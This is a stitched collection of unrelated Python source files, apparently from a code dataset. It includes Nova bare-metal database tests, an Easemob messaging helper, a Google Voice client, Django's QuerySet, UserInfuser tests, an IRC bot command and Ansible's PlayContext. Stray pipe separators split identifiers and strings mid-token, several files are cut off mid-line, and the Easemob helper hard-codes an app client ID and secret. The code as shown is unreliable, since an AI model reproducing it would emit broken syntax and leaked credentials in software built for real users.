        r = db.bm_node_get(self.context, self.ids[0])
        self.assertEqual(r['pm_address'], '0')
        r = db.bm_node_get(self.context, self.ids[1])
        self.assertEqual(r['pm_address'], '1')
        self.assertRaises(
            exception.NodeNotFound,
            db.bm_node_get,
            self.context, -1)
    def test_get_by_service_host(self):
        """get_all filters by service_host; None returns everything."""
        self._create_nodes()
        r = db.bm_node_get_all(self.context, service_host=None)
        self.assertEqual(len(r), 6)
        r = db.bm_node_get_all(self.context, service_host="host1")
        self.assertEqual(len(r), 1)
        self.assertEqual(r[0]['pm_address'], '0')
        r = db.bm_node_get_all(self.context, service_host="host2")
        self.assertEqual(len(r), 5)
        pmaddrs = [x['pm_address'] for x in r]
        self.assertIn('1', pmaddrs)
        self.assertIn('2', pmaddrs)
        self.assertIn('3', pmaddrs)
        self.assertIn('4', pmaddrs)
        self.assertIn('5', pmaddrs)
        r = db.bm_node_get_all(self.context, service_host="host3")
        self.assertEqual(r, [])
    def test_get_associated(self):
        """Associated/unassociated queries split on instance_uuid presence."""
        self._create_nodes()
        r = db.bm_node_get_associated(self.context, service_host=None)
        self.assertEqual(len(r), 1)
        self.assertEqual(r[0]['pm_address'], '1')
        r = db.bm_node_get_unassociated(self.context, service_host=None)
        self.assertEqual(len(r), 5)
        pmaddrs = [x['pm_address'] for x in r]
        self.assertIn('0', pmaddrs)
        self.assertIn('2', pmaddrs)
        self.assertIn('3', pmaddrs)
        self.assertIn('4', pmaddrs)
        self.assertIn('5', pmaddrs)
    def test_destroy(self):
        """destroy removes exactly the targeted node."""
        self._create_nodes()
        db.bm_node_destroy(self.context, self.ids[0])
        self.assertRaises(
            exception.NodeNotFound,
            db.bm_node_get,
            self.context, self.ids[0])
        r = db.bm_node_get_all(self.context)
        self.assertEqual(len(r), 5)
    def test_destroy_with_interfaces(self):
        """destroy cascades to the node's interfaces but not other nodes'."""
        self._create_nodes()
        if_a_id = db.bm_interface_create(self.context, self.ids[0],
                                         'aa:aa:aa:aa:aa:aa', None, None)
        if_b_id = db.bm_interface_create(self.context, self.ids[0],
                                         'bb:bb:bb:bb:bb:bb', None, None)
        if_x_id = db.bm_interface_create(self.context, self.ids[1],
                                         '11:22:33:44:55:66', None, None)
        db.bm_node_destroy(self.context, self.ids[0])
        self.assertRaises(
            exception.NovaException,
            db.bm_interface_get,
            self.context, if_a_id)
        self.assertRaises(
            exception.NovaException,
            db.bm_interface_get,
            self.context, if_b_id)
        # Another node's interface is not affected
        if_x = db.bm_interface_get(self.context, if_x_id)
        self.assertEqual(self.ids[1], if_x['bm_node_id'])
        self.assertRaises(
            exception.NodeNotFound,
            db.bm_node_get,
            self.context, self.ids[0])
        r = db.bm_node_get_all(self.context)
        self.assertEqual(len(r), 5)
    def test_find_free(self):
        """find_free picks the smallest free node meeting each constraint."""
        self._create_nodes()
        fn = db.bm_node_find_free(self.context, 'host2')
        self.assertEqual(fn['pm_address'], '2')
        fn = db.bm_node_find_free(self.context, 'host2',
                                  memory_mb=500, cpus=2, local_gb=100)
        self.assertEqual(fn['pm_address'], '3')
        fn = db.bm_node_find_free(self.context, 'host2',
                                  memory_mb=1001, cpus=1, local_gb=1000)
        self.assertEqual(fn['pm_address'], '4')
        fn = db.bm_node_find_free(self.context, 'host2',
                                  memory_mb=2000, cpus=1, local_gb=1000)
        self.assertEqual(fn['pm_address'], '4')
        fn = db.bm_node_find_free(self.context, 'host2',
                                  memory_mb=2000, cpus=2, local_gb=1000)
        self.assertEqual(fn['pm_address'], '5')
        # check memory_mb
        fn = db.bm_node_find_free(self.context, 'host2',
                                  memory_mb=2001, cpus=2, local_gb=1000)
        self.assertIsNone(fn)
        # check cpus
        fn = db.bm_node_find_free(self.context, 'host2',
                                  memory_mb=2000, cpus=3, local_gb=1000)
        self.assertIsNone(fn)
        # check local_gb
        fn = db.bm_node_find_free(self.context, 'host2',
                                  memory_mb=2000, cpus=2, local_gb=1001)
        self.assertIsNone(fn)
|
wyxpku/pkucourier | user/easemobSendMessage.py | Python | mit | 1,201 | 0.004996 | # -*- coding: UTF-8 -*-
from urllib import request
import json
def send_message(user, message):
    """Send a text message to an Easemob IM user.

    First obtains an app access token via the client-credentials grant,
    then POSTs a txt-type message addressed to *user*.

    Args:
        user: target Easemob username.
        message: text body to deliver.

    Returns:
        The raw JSON response body (str) from the messages endpoint.

    NOTE(review): app credentials are hard-coded below, and user/message
    are spliced into the JSON payload via %-formatting -- quotes or
    backslashes in either will corrupt the request body. Consider
    building the payloads with json.dumps instead.
    """
    # --- Obtain an app token (client-credentials grant) --- #
    url_gettoken = "https://a1.easemob.com/ziyuanliu/pkucarrier/token"
    header = {"Content-Type": "application/json"}
    body = '{"grant_type": "client_credentials","client_id": "YXA6OlYUgJjEEeWXOb1RowOi2A","client_secret": "YXA6Nsfj21Zw60aTAwDd8PWvCnn5obI"}'
    body = body.encode()
    req = request.Request(url_gettoken, body, header)
    resp = request.urlopen(req)
    html = resp.read().decode()
    s = json.loads(html)
    token = s['access_token']
    # --- Send the message --- #
    url = "https://a1.easemob.com/ziyuanliu/pkucarrier/messages"
    # params[msg][msg] carries the text; params[target] lists the recipients.
    params = '{"target_type" : "users", "target" : ["%s"], "msg" : {"type" : "txt", "msg" : "%s"}}' % (user, message)
    header = {"Content-Type": "application/json", "Authorization": "Bearer %s" % (token)}
    params = params.encode()
    req = request.Request(url, params, header)
    resp = request.urlopen(req)
    html = resp.read().decode()
    return html
|
twbarber/pygooglevoice | googlevoice/voice.py | Python | bsd-3-clause | 11,310 | 0.002122 | from conf import config
from util import *
import settings
import base64
# Pre-compiled pattern matching a literal '?' -- presumably used for URL
# query-string handling elsewhere in this module (usage not in view here).
qpat = re.compile(r'\?')
if settings.DEBUG:
    import logging
    logging.basicConfig()
    log = logging.getLogger('PyGoogleVoice')
    log.setLevel(logging.DEBUG)
else:
    # Logging is disabled entirely outside of DEBUG mode.
    log = None
class Voice(object):
"""
Main voice instance for interacting with the Google Voice service
Handles login/logout and most of the baser HTTP methods
"""
    def __init__(self):
        # Install a process-wide urllib opener that carries session cookies,
        # so subsequent requests share the authenticated session.
        install_opener(build_opener(HTTPCookieProcessor(CookieJar())))
        # Expose one XML-page accessor attribute per configured feed,
        # plus the 'message' feed.
        for name in settings.FEEDS:
            setattr(self, name, self.__get_xml_page(name))
        setattr(self, 'message', self.__get_xml_page('message'))
######################
# Some handy methods
######################
    def special(self):
        """
        Returns special identifier for your session (if logged in)
        """
        # Cached value from a previous scrape.
        if hasattr(self, '_special') and getattr(self, '_special'):
            return self._special
        # Build the scraping pattern as bytes or str depending on what this
        # Python version's bytes() accepts (Py3 needs an encoding; Py2's
        # bytes is str; very old versions lack bytes entirely).
        try:
            try:
                regex = bytes("('_rnr_se':) '(.+)'", 'utf8')
            except TypeError:
                regex = bytes("('_rnr_se':) '(.+)'")
        except NameError:
            regex = r"('_rnr_se':) '(.+)'"
        # Scrape the _rnr_se session token out of the inbox page; a failed
        # match (not logged in) yields None.
        try:
            sp = re.search(regex, urlopen(settings.INBOX).read()).group(2)
        except AttributeError:
            sp = None
        self._special = sp
        return sp
    # Expose the scrape as a read-only property.
    special = property(special)
    def login(self, email=None, passwd=None, smsKey=None):
        """
        Login to the service using your Google Voice account
        Credentials will be prompted for if not given as args or in the ``~/.gvoice`` config file
        """
        # Already logged in (session token cached) -- nothing to do.
        if hasattr(self, '_special') and getattr(self, '_special'):
            return self
        # Resolve credentials: explicit args -> config file -> interactive prompt.
        if email is None:
            email = config.email
        if email is None:
            email = input('Email address: ')
        if passwd is None:
            passwd = config.password
        if passwd is None:
            from getpass import getpass
            passwd = getpass()
        content = self.__do_page('login').read()
        # holy hackjob: scrape the hidden GALX anti-forgery token out of the form
        galx = re.search(r"type=\"hidden\"\s+name=\"GALX\"\s+value=\"(.+)\"", content).group(1)
        result = self.__do_page('login', {'Email': email, 'Passwd': passwd, 'GALX': galx})
        # A redirect to the SMS-auth page means two-step verification is on.
        if result.geturl().startswith(getattr(settings, "SMSAUTH")):
            content = self.__smsAuth(smsKey)
            try:
                smsToken = re.search(r"name=\"smsToken\"\s+value=\"([^\"]+)\"", content).group(1)
                galx = re.search(r"name=\"GALX\"\s+value=\"([^\"]+)\"", content).group(1)
                content = self.__do_page('login', {'smsToken': smsToken, 'service': "grandcentral", 'GALX': galx})
            except AttributeError:
                # Expected tokens missing from the response page.
                raise LoginError
            del smsKey, smsToken, galx
        del email, passwd
        # The session is only valid if the special token can now be scraped.
        try:
            assert self.special
        except (AssertionError, AttributeError):
            raise LoginError
        return self
def __smsAuth(self, smsKey=None):
if smsKey is None:
smsKey = config.smsKey
if smsKey is None:
from getpass import getpass
smsPin = getpass("SMS PIN: ")
content = self.__do_page('smsauth', {'smsUserPin': smsPin}).read()
else:
smsKey = base64.b32decode(re.sub(r' ', '', smsKey), casefold=True).encode("hex")
content = self.__oathtoolAuth(smsKey)
try_count = 1
while "The code you entered didn't verify." in content and try_count < 5:
sleep_seconds = 10
try_count += 1
print('invalid code, retrying after %s seconds (attempt %s)' % (sleep_seconds, try_count))
import time
time.sleep(sleep_seconds)
content = self.__oathtoolAuth(smsKey)
del smsKey
return content
def __oathtoolAuth(self, smsKey):
import commands
smsPin = commands.getstatusoutput('oathtool --totp ' + smsKey)[1]
content = self.__do_page('smsauth', {'smsUserPin': smsPin}).read()
del smsPin
return content
def logout(self):
"""
Logs out an instance and makes sure it does not still have a session
"""
self.__do_page('logout')
del self._special
assert self.special == None
return self
def call(self, outgoingNumber, forwardingNumber=None, phoneType=None, subscriberNumber=None):
"""
Make a call to an ``outgoingNumber`` from your ``forwardingNumber`` (optional).
If you pass in your ``forwardingNumber``, please also pass in the correct ``phoneType``
"""
if forwardingNumber is None:
forwardingNumber = config.forwardingNumber
if phoneType is None:
phoneType = config.phoneType
self.__validate_special_page('call', {
'outgoingNumber': outgoingNumber,
'forwardingNumber': forwardingNumber,
'subscriberNumber': subscriberNumber or 'undefined',
'phoneType': phoneType,
'remember': '1'
})
__call__ = call
def cancel(self, outgoingNumber=None, forwardingNumber=None):
"""
Cancels a call matching outgoing and forwarding numbers (if given).
Will raise an error if no matching call is being placed
"""
self.__validate_special_page('cancel', {
'outgoingNumber': outgoingNumber or 'undefined',
'forwardingNumber': forwardingNumber or 'undefined',
'cancelType': 'C2C',
})
def phones(self):
"""
Returns a list of ``Phone`` instances attached to your account.
"""
return [Phone(self, data) for data in self.contacts['phones'].values()]
phones = property(phones)
def settings(self):
"""
Dict of current Google Voice settings
"""
return AttrDict(self.contacts['settings'])
settings = property(settings)
def send_sms(self, phoneNumber, text):
"""
Send an SMS message to a given ``phoneNumber`` with the given ``text`` message
"""
self.__validate_special_page('sms', {'phoneNumber': phoneNumber, 'text': text})
def search(self, query):
"""
Search your Google Voice Account history for calls, voicemails, and sms
Returns ``Folder`` instance containting matching messages
"""
return self.__get_xml_page('search', data='?q=%s' % quote(query))()
def archive(self, msg, archive=1):
"""
Arch | ive the specified message by removing it from the Inbox.
"""
if isinstance(msg, Message):
msg = msg.id
assert is_sha1(msg), 'Message id not a SHA1 hash'
self.__messages_post('archive', msg, archive=archive)
def delete(self, msg, trash=1):
"""
Moves th | is message to the Trash. Use ``message.delete(0)`` to move it out of the Trash.
"""
if isinstance(msg, Message):
msg = msg.id
assert is_sha1(msg), 'Message id not a SHA1 hash'
self.__messages_post('delete', msg, trash=trash)
def download(self, msg, adir=None):
"""
Download a voicemail or recorded call MP3 matching the given ``msg``
which can either be a ``Message`` instance, or a SHA1 identifier.
Saves files to ``adir`` (defaults to current directory).
Message hashes can be found in ``self.voicemail().messages`` for example.
Returns location of saved file.
"""
from os import path, getcwd
if isinstance(msg, Message):
msg = msg.id
assert is_sha1(msg), 'Message id not a SHA1 hash'
if adir is None:
adir = getcwd()
try:
response = self.__do_page('download', msg)
except:
raise DownloadError
fn = path.join(adir, '%s.mp3' % msg)
with open(fn, 'wb') as fo:
fo.write(response.read())
return fn
def contacts(self):
"""
Partial data of you |
ufieeehw/IEEE2015 | ros/ieee2015_controller/src/test.py | Python | gpl-2.0 | 436 | 0 | import numpy as np
mecanum_matrix = np.matrix([
[+1, +1, +1, +1], # Unitless! Shooting for ra | d/s
[+1, -1, +1, -1], # Unitles | s! Shooting for rad/s
[+1, +1, -1, -1], # Unitless! Shooting for rad/s
# [+1, -1, -1, +1], # This is the error row (May not be necessary)
], dtype=np.float32) / 4.0 # All of the rows are divided by 4
v_target = np.array([0.0, 1.0, 0.0])
print np.linalg.lstsq(mecanum_matrix, v_target)[0]
|
uiri/pxqz | venv/lib/python2.7/site-packages/django/db/models/query.py | Python | gpl-3.0 | 69,558 | 0.001409 | """
The main QuerySet implementation. This provides the public API for the ORM.
"""
import copy
import itertools
import sys
from django.db import connections, router, transaction, IntegrityError
from django.db.models.fields import AutoField
from django.db.models.query_utils import (Q, select_related_descend,
deferred_class_factory, InvalidQuery)
from django.db.models.deletion import Collector
from django.db.models import sql
from django.utils.functional import partition
# Used to control how many objects are worked with at once in some cases (e.g.
# when deleting objects).
CHUNK_SIZE = 100
ITER_CHUNK_SIZE = CHUNK_SIZE
# The maximum number of items to display in a QuerySet.__repr__
REPR_OUTPUT_SIZE = 20
# Pull into this namespace for backwards compatibility.
EmptyResultSet = sql.EmptyResultSet
class QuerySet(object):
"""
Represents a lazy database lookup for a set of objects.
"""
def __init__(self, model=None, query=None, using=None):
self.model = model
# EmptyQuerySet instantiates QuerySet with model as None
self._db = using
self.query = query or sql.Query(self.model)
self._result_cache = None
self._iter = None
self._sticky_filter = False
self._for_write = False
self._prefetch_related_lookups = []
self._prefetch_done = False
########################
# PYTHON MAGIC METHODS #
########################
def __deepcopy__(self, memo):
"""
Deep copy of a QuerySet doesn't populate the cache
"""
obj = self.__class__()
for k,v in self.__dict__.items():
if k in ('_iter','_result_cache'):
obj.__dict__[k] = None
else:
obj.__dict__[k] = copy.deepcopy(v, memo)
return obj
def __getstate__(self):
"""
Allows the QuerySet to be pickled.
"""
# Force the cache to be fully populated.
len(self)
obj_dict = self.__dict__.copy()
obj_dict['_iter'] = None
return obj_dict
def __repr__(self):
data = list(self[:REPR_OUTPUT_SIZE + 1])
if len(data) > REPR_OUTPUT_SIZE:
data[-1] = "...(remaining elements truncated)..."
return repr(data)
def __len__(self):
# Since __len__ is called quite frequently (for example, as part of
# list(qs), we make some effort here to be as efficient as possible
# whilst not messing up any existing iterators against the QuerySet.
if self._result_cache is None:
if self._iter:
self._result_cache = list(self._iter)
else:
self._result_cache = list(self.iterator())
elif self._iter:
self._result_cache.extend(self._iter)
if self._prefetch_related_lookups and not self._prefetch_done:
self._prefetch_related_objects()
return len(self._result_cache)
def __iter__(self):
if self._prefetch_related_lookups and not self._prefetch_done:
# We need all the results in order to be able to do the prefetch
# in one go. To minimize code duplication, we use the __len__
# code path which also forces this, and also does the prefetch
len(self)
if self._result_cache is None:
self._iter = self.iterator()
self._result_cache = []
if self._iter:
return self._result_iter()
# Python's list iterator is better than our version when we're just
# iterating over the cache.
return iter(self._result_cache)
def _result_iter(self):
pos = 0
while 1:
upper = len(self._result_cache)
while pos < upper:
yield self._result_cache[pos]
pos = pos + 1
if not self._iter:
raise StopIteration
if len(self._result_cache) <= pos:
self._fill_cache()
def __nonzero__(self):
if self._prefetch_related_lookups and not self._prefetch_done:
# We need all the results in order to be able to do the prefetch
# in one go. To minimize code duplication, we use the __len__
# code path which also forces this, and also does the prefetch
len(self)
if self._result_cache is not None:
return bool(self._result_cache)
try:
iter(self).next()
except StopIteration:
return False
return True
def __contains__(self, val):
# The 'in' operator works without this method, due to __iter__. This
# implementation exists only to shortcut the creation of Model
# instances, by bailing out early if we find a matching element.
pos = 0
if self._result_cache is not None:
if val in self._result_cache:
return True
elif self._iter is None:
# iterator is exhausted, so we have our answer
return False
# remember not to check these again:
pos = len(self._result_cache)
else:
# We need to start filling the result cache out. The following
# ensures that self._iter is not None and self._result_cache is not
# None
it = iter(self)
# Carry on, one result at a time.
while True:
if len(self._result_cache) <= pos:
self._fill_cache(num=1)
if self._iter is None:
# we ran out of items
return False
if self._result_cache[pos] == val:
return True
pos += 1
def __getitem__(self, k) | :
"""
Retrieves an item or slice from the set of results.
"""
if not isinstance(k, (slice, int, long)):
raise TypeError
assert ((not isinstance(k, slice) and (k >= 0))
or (isinstance(k, slice) and (k.start is None or k.start >= 0)
and (k.stop is None or k.stop >= 0))), \
| "Negative indexing is not supported."
if self._result_cache is not None:
if self._iter is not None:
# The result cache has only been partially populated, so we may
# need to fill it out a bit more.
if isinstance(k, slice):
if k.stop is not None:
# Some people insist on passing in strings here.
bound = int(k.stop)
else:
bound = None
else:
bound = k + 1
if len(self._result_cache) < bound:
self._fill_cache(bound - len(self._result_cache))
return self._result_cache[k]
if isinstance(k, slice):
qs = self._clone()
if k.start is not None:
start = int(k.start)
else:
start = None
if k.stop is not None:
stop = int(k.stop)
else:
stop = None
qs.query.set_limits(start, stop)
return k.step and list(qs)[::k.step] or qs
try:
qs = self._clone()
qs.query.set_limits(k, k + 1)
return list(qs)[0]
except self.model.DoesNotExist, e:
raise IndexError(e.args)
def __and__(self, other):
self._merge_sanity_check(other)
if isinstance(other, EmptyQuerySet):
return other._clone()
combined = self._clone()
combined.query.combine(other.query, sql.AND)
return combined
def __or__(self, other):
self._merge_sanity_check(other)
combined = self._clone()
if isinstance(other, EmptyQuerySet):
return combined
combined.query.combine(other.query, sql.OR)
return combined
####################################
# METHODS THAT DO DATABASE QUERIES #
####################################
def iterator(self):
"""
An iterator over the results from applying this Qu |
nlake44/UserInfuser | serverside/testing/test.py | Python | agpl-3.0 | 22,168 | 0.015292 | # Copyright (C) 2011, CloudCaptive
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
""" All paths here run unit tests
"""
import webapp2
from google.appengine.api import mail, memcache
from google.appengine.ext import db
from google.appengine.ext.db import *
from serverside import constants
from serverside.entities import memcache_db
from serverside.entities.accounts import *
from serverside.entities.badges import *
from serverside.entities.pending_create import *
from serverside.entities.users import *
from serverside.entities.widgets import *
from serverside.dao import accounts_dao
from serverside.session import Session
from serverside.tools.utils import account_login_required
from serverside import logs
from serverside.entities.logs import Logs
from serverside.testing.dummydata import *
import cgi
import logging
import os
import time
import wsgiref.handlers
import random
class TestDB(webapp2.RequestHandler):
def get(self):
self.response.out.write("Test 1:" +self.test1() +"<br>")
self.response.out.write("Test 2:" + self.test2() +"<br>")
self.response.out.write("Test 3:" + self.test3() +"<br>")
self.response.out.write("Test 4:" + self.test4() +"<br>")
""" This test creates, updates, and deletes an Account """
def test1(self):
key = "test@test.com"
ent_type = "Accounts"
trophy_case_widget = TrophyCase(key_name=key)
points_widget = Points(key_name=key)
rank_widget = Rank(key_name=key)
newacc = Accounts(key_name=key,
password="aaa",
email=key,
isEnabled="enabled",
accountType="bronze",
paymentType="free",
cookieKey="xxx",
apiKey="xxx",
trophyWidget=trophy_case_widget,
pointsWidget=points_widget,
rankWidget=rank_widget)
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, key)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.email != key:
return "Error getting same account. Subtest 1"
# purge from memcache and get from db
memcache.delete(key=key, namespace=ent_type)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.email != key:
return "Error getting same account from DB (no cache). Subtest 2"
# Set and get new user name
diction = {"email":"test2@test.com"}
ret2 = memcache_db.update_fields(key, ent_type, diction)
ret2 = sameent.put()
if ret != ret2:
self.response.out.write("Error getting key name")
sameent = memcache_db.get_entity(key, ent_type)
if sameent.email != "test2@test.com":
return "Error getting same account after altering entity. Subtest 3"
try:
memcache_db.delete_entity(newacc, key)
except Exception:
return "Error deleting entity. Subtest 4"
return "Success"
""" This test creates, updates, and deletes a Badges entity"""
def test2(self):
account_key = "raj"
trophy_case_widget = TrophyCase(key_name=account_key)
points_widget = Points(key_name=account_key)
rank_widget = Rank(key_name=account_key)
newacc = Accounts(key_name=account_key,
password="aaa",
email="a@a.a",
isEnabled="enabled",
accountType="bronze",
paymentType="free",
apiKey="xxx",
cookieKey="xxx",
trophyWidget=trophy_case_widget,
pointsWidget=points_widget,
rankWidget=rank_widget)
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, account_key)
key = "testbadge1"
ent_type = "Badges"
newacc = Badges(key_name=key,
name="badge1",
description=key,
altText="a really cool badge",
setType="free",
isEnabled="yes",
creator=newacc,
permissions="private",
blobKey="xxxx",
storageType="blob")
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, key)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.description != key:
| return "Error getting same account. Subtest 1"
# purge from memcache and get from db
memcache.delete(key=key, namespace=ent_type)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.description != key:
return "Error getting same account from DB (no cache). Subtest 2"
# Set and get new user name
diction = {"isEnabled":"no", "permissions":"public"}
ret2 = memcache_db.update_fields(key, ent_type, diction)
ret2 = sameent.put()
if | ret != ret2:
self.response.out.write("Error getting key name")
sameent = memcache_db.get_entity(key, ent_type)
if sameent.isEnabled != "no" or sameent.permissions != "public":
return "Error getting same account after altering entity. Subtest 3"
try:
memcache_db.delete_entity(sameent, key)
except Exception:
return "Error deleting entity. Subtest 4"
try:
memcache_db.delete_entity(newacc, account_key)
except Exception:
return "Error deleting account. Subtest 5"
return "Success"
""" This test creates, updates, and deletes User"""
def test3(self):
account_key = "a@a.a"
trophy_case_widget = TrophyCase(key_name=account_key)
points_widget = Points(key_name=account_key)
rank_widget = Rank(key_name=account_key)
newacc = Accounts(key_name=account_key,
password="aaa",
email="a@a.a",
isEnabled="enabled",
accountType="bronze",
paymentType="free",
apiKey="xxx",
cookieKey="xxx",
trophyWidget=trophy_case_widget,
pointsWidget=points_widget,
rankWidget=rank_widget)
try:
memcache_db.delete_entity(newacc, account_key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, account_key)
key = "testuser1"
ent_type = "Users"
newacc = Users(key_name=key,
userid=key,
isEnabled="yes",
accountRef=newacc,
tags = key)
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, key)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.tags != key:
return "Error getting same entity. Subtest 1"
# purge from memcache and get from db
memcache.delete(key=key, namespace=ent_type)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.tags != key:
return "Error getting same entity from DB (no cache). Subtest 2"
# Set and get new user name
diction = {"tags":"goodbye:hello"}
ret2 = memcache_db.update_fields(key, ent_type, diction)
ret2 = sameent.put()
if ret != ret2:
self.response.out.write("Error getting key name")
sameent = memcache_db.get_entity(key, ent_type)
if sameent.tags != "goodbye:he |
richrd/bx | modules/newpass.py | Python | apache-2.0 | 939 | 0.00426 | from mod_base import*
class NewPass(Command):
"""Change your password.
Usage: newpass oldpassword newpassword newpassword
"""
def ru | n(self, win, user, data, caller=None):
args = Args(data)
if len(args) < 3:
win.Send("Usage: newpass oldpassword newpassword n | ewpassword")
return False
if not user.IsAuthed():
win.Send("you've not logged in")
return False
oldpass, pass1, pass2 = args[0:3]
if pass1 == pass2:
if self.bot.config.ChangeAccountPass(user.account["name"], oldpass, pass1):
win.Send("password changed!")
else:
win.Send("failed to change password! make sure your old password is correct.")
else:
win.Send("your new password didn't match up")
module = {
"class": NewPass,
"type": MOD_COMMAND,
"level": 0,
"zone": IRC_ZONE_QUERY,
}
|
mzizzi/ansible | lib/ansible/playbook/play_context.py | Python | gpl-3.0 | 27,386 | 0.002347 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be u | seful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import ra | ndom
import re
import string
import sys
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.module_utils.six import iteritems
from ansible.module_utils.six.moves import shlex_quote
from ansible.module_utils._text import to_bytes
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.playbook.attribute import FieldAttribute
from ansible.playbook.base import Base
from ansible.utils.ssh_functions import check_for_controlpersist
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['PlayContext']
# the magic variable mapping dictionary below is used to translate
# host/inventory variables to fields in the PlayContext
# object. The dictionary values are tuples, to account for aliases
# in variable names.
MAGIC_VARIABLE_MAPPING = dict(
connection=('ansible_connection', ),
remote_addr=('ansible_ssh_host', 'ansible_host'),
remote_user=('ansible_ssh_user', 'ansible_user'),
remote_tmp_dir=('ansible_remote_tmp', ),
port=('ansible_ssh_port', 'ansible_port'),
timeout=('ansible_ssh_timeout', 'ansible_timeout'),
ssh_executable=('ansible_ssh_executable', ),
accelerate_port=('ansible_accelerate_port', ),
password=('ansible_ssh_pass', 'ansible_password'),
private_key_file=('ansible_ssh_private_key_file', 'ansible_private_key_file'),
pipelining=('ansible_ssh_pipelining', 'ansible_pipelining'),
shell=('ansible_shell_type', ),
network_os=('ansible_network_os', ),
become=('ansible_become', ),
become_method=('ansible_become_method', ),
become_user=('ansible_become_user', ),
become_pass=('ansible_become_password', 'ansible_become_pass'),
become_exe=('ansible_become_exe', ),
become_flags=('ansible_become_flags', ),
ssh_common_args=('ansible_ssh_common_args', ),
docker_extra_args=('ansible_docker_extra_args', ),
sftp_extra_args=('ansible_sftp_extra_args', ),
scp_extra_args=('ansible_scp_extra_args', ),
ssh_extra_args=('ansible_ssh_extra_args', ),
ssh_transfer_method=('ansible_ssh_transfer_method', ),
sudo=('ansible_sudo', ),
sudo_user=('ansible_sudo_user', ),
sudo_pass=('ansible_sudo_password', 'ansible_sudo_pass'),
sudo_exe=('ansible_sudo_exe', ),
sudo_flags=('ansible_sudo_flags', ),
su=('ansible_su', ),
su_user=('ansible_su_user', ),
su_pass=('ansible_su_password', 'ansible_su_pass'),
su_exe=('ansible_su_exe', ),
su_flags=('ansible_su_flags', ),
executable=('ansible_shell_executable', ),
module_compression=('ansible_module_compression', ),
)
b_SU_PROMPT_LOCALIZATIONS = [
to_bytes('Password'),
to_bytes('암호'),
to_bytes('パスワード'),
to_bytes('Adgangskode'),
to_bytes('Contraseña'),
to_bytes('Contrasenya'),
to_bytes('Hasło'),
to_bytes('Heslo'),
to_bytes('Jelszó'),
to_bytes('Lösenord'),
to_bytes('Mật khẩu'),
to_bytes('Mot de passe'),
to_bytes('Parola'),
to_bytes('Parool'),
to_bytes('Pasahitza'),
to_bytes('Passord'),
to_bytes('Passwort'),
to_bytes('Salasana'),
to_bytes('Sandi'),
to_bytes('Senha'),
to_bytes('Wachtwoord'),
to_bytes('ססמה'),
to_bytes('Лозинка'),
to_bytes('Парола'),
to_bytes('Пароль'),
to_bytes('गुप्तशब्द'),
to_bytes('शब्दकूट'),
to_bytes('సంకేతపదము'),
to_bytes('හස්පදය'),
to_bytes('密码'),
to_bytes('密碼'),
to_bytes('口令'),
]
TASK_ATTRIBUTE_OVERRIDES = (
'become',
'become_user',
'become_pass',
'become_method',
'become_flags',
'connection',
'docker_extra_args',
'delegate_to',
'no_log',
'remote_user',
)
RESET_VARS = (
'ansible_connection',
'ansible_docker_extra_args',
'ansible_ssh_host',
'ansible_ssh_pass',
'ansible_ssh_port',
'ansible_ssh_user',
'ansible_ssh_private_key_file',
'ansible_ssh_pipelining',
'ansible_ssh_executable',
'ansible_user',
'ansible_host',
'ansible_port',
)
class PlayContext(Base):
'''
This class is used to consolidate the connection information for
hosts in a play and child tasks, where the task may override some
connection/authentication information.
'''
# connection fields, some are inherited from Base:
# (connection, port, remote_user, environment, no_log)
_docker_extra_args = FieldAttribute(isa='string')
_remote_addr = FieldAttribute(isa='string')
_remote_tmp_dir = FieldAttribute(isa='string', default=C.DEFAULT_REMOTE_TMP)
_password = FieldAttribute(isa='string')
_private_key_file = FieldAttribute(isa='string', default=C.DEFAULT_PRIVATE_KEY_FILE)
_timeout = FieldAttribute(isa='int', default=C.DEFAULT_TIMEOUT)
_shell = FieldAttribute(isa='string')
_network_os = FieldAttribute(isa='string')
_connection_user = FieldAttribute(isa='string')
_ssh_args = FieldAttribute(isa='string', default=C.ANSIBLE_SSH_ARGS)
_ssh_common_args = FieldAttribute(isa='string')
_sftp_extra_args = FieldAttribute(isa='string')
_scp_extra_args = FieldAttribute(isa='string')
_ssh_extra_args = FieldAttribute(isa='string')
_ssh_executable = FieldAttribute(isa='string', default=C.ANSIBLE_SSH_EXECUTABLE)
_ssh_transfer_method = FieldAttribute(isa='string', default=C.DEFAULT_SSH_TRANSFER_METHOD)
_connection_lockfd = FieldAttribute(isa='int')
_pipelining = FieldAttribute(isa='bool', default=C.ANSIBLE_SSH_PIPELINING)
_accelerate = FieldAttribute(isa='bool', default=False)
